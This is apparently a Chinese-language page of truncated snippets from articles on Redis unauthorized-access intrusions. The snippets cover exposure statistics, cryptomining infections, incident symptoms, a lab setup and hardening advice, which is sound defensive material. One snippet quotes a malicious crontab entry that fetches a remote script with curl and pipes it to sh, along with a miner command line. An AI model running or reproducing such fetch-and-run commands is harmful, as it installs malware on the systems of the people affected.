▲针对全球6379端口的redis服务器做了扫描,结果如上图 如图开放在公网的redis的6379端口的ip总数有63443个.无密码认证的IP有43024个,在总数占比里达到67%.发现遭受到redis crackit事件影响的服务器达到35024,在总数占比中达到55%,在无密码认证的redis数量中占比达到81%左右. 事件描述 很多使用者都是把redis下载到服务器直接运行使用,无ACL,无密码,root运行,且绑定在0.0.0.0:6379,暴露在公网.攻击者在未授 权访问 Redis…

在使用云服务器时,安装的redis3.0+版本都关闭了protected-mode,因而都遭遇了挖矿病毒的攻击,使得服务器99%的占用率!! 因此我们在使用redis时候,最好更改默认端口,并且使用redis密码登录. (1)redis没有用户概念,redis只有密码(2)redis默认在工作在保护模式下.不允许远程任何用户登录的(protected-mode) redis.conf设置 protected-mode yes #打开保护模式 port 6380 #更改默认启动端口 require…

今天发现服务器有异常进程/opt/yam/yam,上网搜了搜,是由于redis未授权引起的入侵,查了些资料,这里做下总结. 1. 现象 有以下其一现象就要注意是否被入侵 crontab -l 可以看到类似"*/15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0623 | sh". ps -ef 可以看到进程 "/opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4U…

好吧,我也做了回标题党,像我这么细心的同学,怎么可能让服务器被入侵呢? 其实是这样的,昨天我和一个朋友聊天,他说他自己有一台云服务器运行了 Redis 数据库,有一天突然发现数据库里的数据全没了,只剩下一个奇奇怪怪的键值对,其中值看起来像一个 RSA 公钥的字符串,他以为是误操作删库了,幸好自己的服务器里没啥重要的数据,也就没在意. 经过一番攀谈交心了解到,他跑了一个比较古老已经停止维护的开源项目,安装的旧版本的 Redis,而且他对 Linux 的使用不是很熟练.我就知道,他的服务器已经被攻陷…

top 看到一个bashd的进程占据了cpu ps aux |grep bashd cd /tmp 发现ddg.2011 的文件.root dump.rdb 在/root/.ssh  也有奇怪的文件 vim /etc/sshd/sshd_config 被人修改过 cd /var/spool/cron 被人加了新的crontab 全部删除,crontab 里面有他执行的脚本和命令,服务器ip: 在/etc/ 下有一个/etc/redis-sentinel.conf  监视redis 进程的配置文件…

0x00 简要说明 百度百科:Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写.支持网络.可基于内存亦可持久化的日志型.Key-Value数据库,并提供多种语言的API. Redis因配置不当可导致攻击者直接获取到服务器的权限. 利用条件:redis以root身份运行,未授权访问,弱口令或者口令泄露等 环境准备: 测试环境 IP Kali 192.168.100.99 靶机(CentOS 7) 192.168.100.101…

redis安装: windows安装包:http://pan.baidu.com/s/1i3jLlC5 下载下来之后,开始安装: redis-server.exe redis.conf: 简单一步,安装成功,保持这个windows持续运行~ 查看一下我们本机的端口,可以看到多了一个6379端口,安全风险来了,记得设置redis的密码~ 接下来,开始利用redis-cli.exe来进行远程redis的入侵: 如果远程redis数据库存在未授权访问漏洞,则可以直接上传shell: 开启redis客户…

目录 redis漏洞 入侵特征 安全隐患 redis安全规范 禁止root用户启动 限制redis文件目录访问权限 开启密码认证,设置复杂密码 禁用或重命名危险命令 设置允许监听地址,不要使用0.0.0.0 尽量修改默认端口6379 信任的内网运行,尽量避免有公网访问 Redis漏洞 Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Red…

一.Redis基本介绍 (1)Redis介绍 Redis 是一个开源(BSD许可)的,内存中的数据结构存储系统,它可以用作数据库.缓存和消息中间件. 它支持多种类型的数据结构,如 字符串(strings), 散列(hashes), 列表(lists), 集合(sets), 有序集合(sorted sets) 与范围查询,` bitmaps,hyperloglogs 和 地理空间(geospatial) 索引半径查询.Redis 内置了 复制(replication), LUA脚本(Lua scr…

漏洞概述 近日,互联网出现watchdogs挖矿病毒,攻击者可以利用Redis未授权访问漏洞入侵服务器,通过内外网扫描感染更多机器.被感染的主机出现 crontab 任务异常.系统文件被删除.CPU 异常等情况,并且会自动感染更多机器,严重影响业务正常运行甚至导致崩溃. 在此,小哥建议您及时开展Redis业务自查并进行升级修复,避免业务和经济损失. 漏洞影响 1.数据泄露.Redis被远程控制,泄漏敏感业务数据 2.病毒感染.如果机器本身未加固,可通过Redis漏洞入侵主机资源,并进行系统破坏.…